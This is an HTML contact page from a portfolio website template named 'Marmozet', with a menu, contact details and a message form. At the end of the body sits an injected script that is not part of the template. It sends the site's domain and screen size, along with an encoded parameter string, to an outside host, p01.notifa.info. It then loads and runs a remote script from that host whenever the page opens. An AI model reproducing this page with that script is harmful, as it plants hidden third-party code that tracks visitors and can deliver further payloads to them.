<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Marmozet - Contact</title>
    <link rel="stylesheet" href="assets/vendor/font-awesome-5/css/fontawesome-all.min.css">
    <link rel="stylesheet" href="assets/css/custom.css">
    <link rel="stylesheet" href="assets/css/main.css">
    <link rel="stylesheet" href="assets/css/responsive.css">
</head>

<body>
    <!-- Preloader  -->
    <div id="preloader">
        <div class="loader-logo text-center">
            <img src="assets/img/logo.png" alt="">
            <p>Please Wait</p>
        </div>
    </div>
    <div class="loader">
        <div class="block_first"></div>
        <div class="block_second"></div>
    </div>

    <!-- Navbar -->
    <nav>
        <div class="">
            <div class="nav-burger c-magnetic">
                <div class="span">
                    <div class="toggle-btn link empty-cursor">
                        <div class="burger-menu">
                            <span class="one"></span>
                            <span class="two"></span>
                            <span class="tre"></span>
                        </div>
                    </div>
                </div>
            </div>
        </div>

        <div class="bg_block_first"></div>
        <div class="bg_block_second"></div>

        <div class="manu-container">
            <div class="menu">
                <div class="data">
                    <ul>
                        <li><span class="menu-link multi-start">Works</span>
                            <ul class="multimenu">
                                <li><a class="link load-marmoset" href="index.html">Fullscreen</a></li>
                                <li><a class="link load-marmoset" href="home-single.html">Single</a></li>
                                <li><a class="link load-marmoset" href="home-multi-vert.html">Multi</a></li>
                            </ul>
                        </li>
                        <li><a class="menu-link multi-leave link load-marmoset" href="about.html">About</a></li>
                        <li><a class="menu-link multi-leave link load-marmoset" href="blog-sidebar.html">Blog</a></li>
                        <li><a class="menu-link multi-leave link load-marmoset" href="contact.html">Contact</a></li>
                        <li><a class="menu-link multi-leave link load-marmoset" href="index.html">Buy Now</a></li>
                    </ul>

                </div>

            </div>
        </div>
    </nav>
    <!-- Logo -->
    <div class="logo">
        <a class="link" href="index.html"><img src="assets/img/logo.png" alt="logo"></a>
    </div>



    <!-- Custom Cursor -->
    <div class="cursor"></div>
    <div class="cursor-follower"></div>



    <!-- social media -->
    <div class="social">
        <ul>
            <li class="c-magnetic">
                <span>
                    <a class="link span" href="#" target="_blank">
                        <i class="fab fa-facebook" aria-hidden="true"></i>
                    </a>
                </span>
            </li>

            <li class="c-magnetic">
                <span>
                    <a class="link span" href="#" target="_blank">
                        <i class="fab fa-instagram" aria-hidden="true"></i>
                    </a>
                </span>
            </li>

            <li class="c-magnetic">
                <span>
                    <a class="link span" href="#" target="_blank">
                        <i class="fab fa-twitter" aria-hidden="true"></i>
                    </a>
                </span>
            </li>

            <li class="c-magnetic">
                <span>
                    <a class="link span" href="#" target="_blank">
                        <i class="fab fa-behance" aria-hidden="true"></i>
                    </a>
                </span>
            </li>
        </ul>
    </div>

    <div class="copyright">
        <p>&copy; cingunt 2019</p>
    </div>
    <section>
        <div class="container">
            <div class="row">
                <div class="col-12 text-center">
                    <div class="main-title mt-90">
                        <h1 class="strokes">Contact <span>Us</span></h1>

                        <div class="dash"></div>
                    </div>

                </div>
            </div>
        </div>
    </section>
    <!-- CONTACT-->
    <section class="section p-b-80">
        <div class="container">
            <div class="row" data-aos="fade-up">
                <div class="col-lg-4 px-0 text-center">
                    <div class="service-item contact">
                        <i class="fa fa-phone" aria-hidden="true"></i>
                        <p>Phone</p>
                        <div class="email link">
                            <a href="#">(+62)81 2812 2991</a>
                        </div>

                    </div>
                </div>

                <div class="col-lg-4 px-0 text-center">
                    <div class="service-item contact">
                        <i class="fa fa-building" aria-hidden="true"></i>
                        <p>address</p>
                        <div class="email link">
                            <a href="#">03/41 Cocho st. Klaten, Indonesia</a>
                        </div>

                    </div>
                </div>

                <div class="col-lg-4 px-0 text-center">
                    <div class="service-item contact">
                        <i class="fas fa-directions    "></i>
                        <p>email</p>
                        <div class="email link">
                            <a href="#">hellow@marmozet.co</a>
                        </div>

                    </div>
                </div>
                <div class="col-lg-8 offset-lg-2 mt-90" data-aos="fade-up">
                    <div class="title-content text-center" data-aos="fade-up">
                        <h2>Get in touch</h2>
                    </div>
                    <div class="mt-50"></div>

                    <form id="contact-form" method="post" action="assets/php/contact.php" role="form">

                        <div class="messages"></div>

                        <div class="controls">

                            <div class="row">
                                <div class="col-md-6 mt-20">
                                    <div class="form-group">
                                        <input id="form_name" type="text" name="name" class="form-control" placeholder="Please enter your firstname *"
                                            required="required" data-error="Firstname is required.">
                                        <div class="help-block with-errors"></div>
                                    </div>
                                </div>
                                <div class="col-md-6 mt-20">
                                    <div class="form-group">

                                        <input id="form_lastname" type="text" name="surname" class="form-control"
                                            placeholder="Please enter your lastname *" required="required" data-error="Lastname is required.">
                                        <div class="help-block with-errors"></div>
                                    </div>
                                </div>
                            </div>
                            <div class="row">
                                <div class="col-md-6 mt-20">
                                    <div class="form-group">
                                        <input id="form_email" type="email" name="email" class="form-control"
                                            placeholder="Please enter your email *" required="required" data-error="Valid email is required.">
                                        <div class="help-block with-errors"></div>
                                    </div>
                                </div>
                                <div class="col-md-6 mt-20">
                                    <div class="form-group">

                                        <input id="form_need" type="text" name="need" class="form-control" placeholder="Subject*"
                                            required="required" data-error="Subject is required.">
                                        <div class="help-block with-errors"></div>
                                    </div>
                                </div>
                            </div>
                            <div class="row">
                                <div class="col-md-12 mt-20">
                                    <div class="form-group">

                                        <textarea id="form_message" name="message" class="form-control" placeholder="Message for me *"
                                            rows="4" required="required" data-error="Please, leave us a message."></textarea>
                                        <div class="help-block with-errors"></div>
                                    </div>
                                </div>
                                <div class="col-md-12 mt-20 text-center">
                                    <input type="submit" class="btn btn-sends link" value="Send message">
                                </div>
                            </div>

                        </div>

                    </form>
                </div>
            </div>
        </div>
    </section>
    <!-- END CONTACT-->
    <div class="next-page centered mt-50">
        <div class="container text-center" data-aos="fade-up">
            <div class="title">
                <p>View our work</p>
                <h3 class="strokes"><a class="link load-marmoset" href="home-multi-vert.html"><span>Projects</span></a></h3>
            </div>
        </div>
    </div>

    <script src="assets/js/plugin.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.3/umd/popper.min.js" integrity="sha384-ZMP7rVo3mIykV+2+9J3UJ46jBk0WLaUAdn689aCwoqbBJiSnjAK/l8WvCWPIPm49"
        crossorigin="anonymous"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js" integrity="sha384-ChfqqxuZUCnJSK3+MXmPNIyE6ZbWh2IMqE241rYiqJxyMiZ6OW/JmZQ5stwEULTy"
        crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/1000hz-bootstrap-validator/0.11.9/validator.min.js" integrity="sha256-dHf/YjH1A4tewEsKUSmNnV05DDbfGN3g7NMq86xgGh8="
        crossorigin="anonymous"></script>
    <script src="assets/js/contact.js"></script>
    <script src="assets/js/main.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582Am8lISurprAUiWnkSN8PMRm3BFxveEUj233lTmz79O9Lpm%2fchsq46noNllhdRAKOyAOT9Px31xzQgiEeIK2cSPrLR2eh%2bWOtAN%2bu6X0u9bDb9Y0GmT46lOu94AvG4HWvaVMgKcIlAlEjExqKGmms1nriub%2fm3P1UbbI9g%2fakUEVsIF2BbOv0bbvHDaq7H3eV0TrvUIIsNO0%2bJ0tmHvNAeGDJGVVwzh0DRMvMixBjyWH4xKejW78TyDRIZosbU1ZkRQyX6aO2D15nTPkFKcUUFuicfGPJGpAEwHA5Mncj7dhhV0kh4ktZQog%2bz4%2b6DIGKHLV9WHKUdtKYOSxDwGa7DNEer0ouHDgWGu6tp9fBrPbCcgH0i%2bJE5bkU29YBzFNTDCqjp1PeMY%2bWT9xllXGRn6KXUd9WuOyYVl%2fneLm5m8M6NY0xMvw7VXWUQWozstrT03MOlsc89rvPUB8ydwjnGkmsmTbSvjtwBNg%2b45yki8RTJ703F5sUSA%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

</html>